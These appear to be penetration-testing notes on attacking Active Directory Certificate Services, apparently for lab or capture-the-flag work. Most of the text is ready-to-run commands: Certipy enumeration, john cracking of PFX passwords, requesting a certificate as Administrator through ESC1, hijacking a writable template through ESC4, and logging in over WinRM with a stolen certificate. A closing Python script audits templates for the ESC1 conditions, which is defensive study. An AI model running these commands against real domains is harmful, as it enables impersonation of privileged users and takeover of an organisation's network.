####
ADCS
####

***********
Enumeration
***********

| https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html
|
| Certipy can list vulnerable ADCS templates for the given user credentials.

.. code-block:: bash

    certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -vulnerable -stdout

|
| If it doesn't return any vulnerable templates, you can review each template to see other users/groups you may want to leverage.

.. code-block:: bash

    certipy find -u 'user'@domain.com -p 'password' -dc-ip 1.2.3.4 -stdout

|
| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation

*****
Usage
*****

| How to use a certificate / PFX file
| NetExec supports PFX files

.. code-block:: bash

    nxc smb dc01.domain.htb -u administrator --pfx-cert administrator.pfx -x whoami

.. code-block:: bash

    # Crack the PFX password, if it has one
    pfx2john.py legacyy_dev_auth.pfx > hashpfx
    /opt/john/run/john hashpfx -wordlist=/usr/share/wordlists/rockyou.txt

    # Save the PFX without password protection
    certipy cert -export -pfx protected.pfx -password "password" -out unprotected.pfx

    # Request a TGT (then pass the ticket)
    certipy auth -pfx unprotected.pfx -dc-ip 1.2.3.4 -domain 'domain.local' -username 'Administrator'

    # OR...

    # Extract the cert and key from the PFX
    certipy cert -pfx unprotected.pfx -nokey -out user.crt
    certipy cert -pfx unprotected.pfx -nocert -out user.key

    # Use the cert and key to connect with WinRM
    # https://gitlab.com/charles.gargasson/wintools/-/blob/main/winrmcert.rb
    ruby winrmcert.rb --ip 10.129.227.113 --cert user.crt --key user.key

****
ESC1
****

| ESC1 - Misconfigured Certificate Templates
| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc1-enrollee-supplied-subject-for-client-authentication
|
| You need to check whether the template allows impersonation ("Enrollee Supplies Subject" set to True).
| Then check whether you are in one of the groups that hold enrollment rights.
| If you meet the requirements, generate a PFX certificate using the vulnerable template.

.. code-block:: bash

    DC_IP="1.2.3.4"
    DOMAIN="domain.com"
    CANAME="theCAname"
    TEMPLATE="VulnerableTemplate"
    IMPERSONATE="Administrator"
    UNPRIVILEGED_USER="beepboop"
    UNPRIVILEGED_USER_PASS='potate'

    certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -ca "$CANAME" -template "$TEMPLATE" -dc-ip $DC_IP -upn "$IMPERSONATE@$DOMAIN" -dns-tcp -ns $DC_IP -debug

****
ESC4
****

| ESC4 - Vulnerable Certificate Template Access Control
| https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc4-template-hijacking
|
| You manipulate the template to make it vulnerable to ESC1.

.. code-block:: bash

    # Modify the template (and back up the old configuration)
    certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -save-old

    # Exploit ESC1, retrieve the impersonated user's certificate
    certipy req -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -ca "$CANAME" -upn "$IMPERSONATE@$DOMAIN"

    # Restore the original configuration
    certipy template -u "$UNPRIVILEGED_USER@$DOMAIN" -p "$UNPRIVILEGED_USER_PASS" -dc-ip $DC_IP -template "$TEMPLATE" -configuration "${TEMPLATE}.json"
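| The ESC1 conditions above (enrollee-supplied subject, no manager approval, no authorized signatures, an EKU usable for client authentication) are what ``certipy find -vulnerable`` evaluates, and ESC4 matters because a writable template can be rewritten into exactly that state. The following is an added audit example, not code from the original notes or from Certipy: it checks template records shaped like the LDAP attributes of objects in the Certificate Templates container (``msPKI-Certificate-Name-Flag``, ``msPKI-Enrollment-Flag``, ``msPKI-RA-Signature``, ``pKIExtendedKeyUsage``) and reports which ones need remediation. The sample records are constructed inline; evaluating the template's enrollment ACL, which the text says you must also check, is left out.

```python
"""Audit ADCS certificate templates for the ESC1 conditions (added example).

Not part of the original notes or of Certipy. Template records are constructed
inline to mimic the LDAP attributes of objects under the Certificate Templates
container; real values would come from an LDAP query.
"""

# msPKI-Certificate-Name-Flag bit: requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request is held for manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let the issued certificate authenticate a user to the domain.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


def allows_client_auth(ekus):
    """An empty pKIExtendedKeyUsage means no restriction, so it counts too."""
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))


def esc1_findings(template):
    """Return the satisfied ESC1 conditions, or [] if any one of them fails."""
    checks = [
        (bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
         "enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)"),
        (not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
         "no manager approval (CT_FLAG_PEND_ALL_REQUESTS clear)"),
        (template.get("msPKI-RA-Signature", 0) == 0,
         "no authorized signatures required (msPKI-RA-Signature = 0)"),
        (allows_client_auth(template.get("pKIExtendedKeyUsage", [])),
         "EKU permits client authentication"),
    ]
    if all(ok for ok, _ in checks):
        return [reason for _, reason in checks]
    return []


def audit(templates):
    """Map template name -> findings for every template meeting all ESC1 conditions.

    Enrollment rights (the template's security descriptor) still have to be
    reviewed separately: a hit here only matters for principals allowed to
    enroll. Remediation is to clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, require
    manager approval, or restrict who may enroll.
    """
    report = {}
    for template in templates:
        findings = esc1_findings(template)
        if findings:
            report[template["cn"]] = findings
    return report


# Constructed sample records (illustrative values, not from any real forest).
SAMPLE_TEMPLATES = [
    {   # User-style template: subject is built from AD, not supplied.
        "cn": "User",
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
    },
    {   # The ESC1 case from the notes above.
        "cn": "VulnerableTemplate",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    },
    {   # Same flags, but manager approval stops automatic issuance.
        "cn": "ApprovedClientAuth",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    },
    {   # Enrollee-supplied subject with no EKU restriction at all.
        "cn": "NoEkuTemplate",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": [],
    },
    {   # Supplied subject, but only Server Authentication: no logon use.
        "cn": "WebServer",
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
    },
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}")
        for reason in reasons:
            print(f"    - {reason}")
```

| Running it on the constructed records flags ``VulnerableTemplate`` and ``NoEkuTemplate`` only; the approval-gated and server-only templates pass, which is the distinction a remediation ticket should make.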